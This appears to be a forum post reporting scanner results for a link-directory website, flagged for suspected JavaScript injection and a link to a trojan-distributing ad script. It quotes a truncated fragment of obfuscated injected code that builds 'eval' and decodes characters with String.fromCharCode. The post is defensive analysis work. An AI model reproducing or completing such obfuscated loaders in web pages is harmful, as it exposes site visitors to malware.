Injection Check: Suspicious Text after HTML
var date=new date(),pau=('ev'+date.getfullyear()).replace('2010','al');g=window[pau];sf=window['string'].fromcharcode;g(sf(4.5*2,59*2,48.5*Flagged here as suspicious: http://app.webinspector.com/public/reports/show_website?site=http%3A%2F%2Fpr5dir.com WhatWeb info: htxp://pr5dir.com [200] PHP-Link-Directory[3.2.0], Meta-Author[PageRank 5 Directory / Cast-Iron Solutions LLC], MetaGenerator[PHP Link Directory 3.2.0], HTTPServer[LiteSpeed], PoweredBy[:], IP[173.193.201.151], PHP[5.3.28], Blocked external link: htxp://www.ppcadcenter.com/Openads/adx.js This URL is or was distributing a malware variant of JS/Kryptik.AGR trojan - status Up(nil): unknown_html on IP IDS for other domain on IP: http://urlquery.net/report.php?id=5912093 X-Powered-By[PHP/5.3.28], Cookies[PHPSESSID], Title[PageRank 5 Directory], Country[UNITED STATES][US]
Possible malware found: http://sucuri.net/malware/malware-entry-mwanomalysp8 → http://app.webinspector.com/public/reports/19853967
{ptential;ly suspicious files flagged by Quttera’s: http://www.quttera.com/detailed_report/pr5dir.com
view code: http://jsunpack.jeek.org/?report=b1461d8a81ed69acc97c204615e75fb8202ad7e4 →
Detected potentially suspicious initialization of function pointer to JavaScript method String.fromCharCode
polonus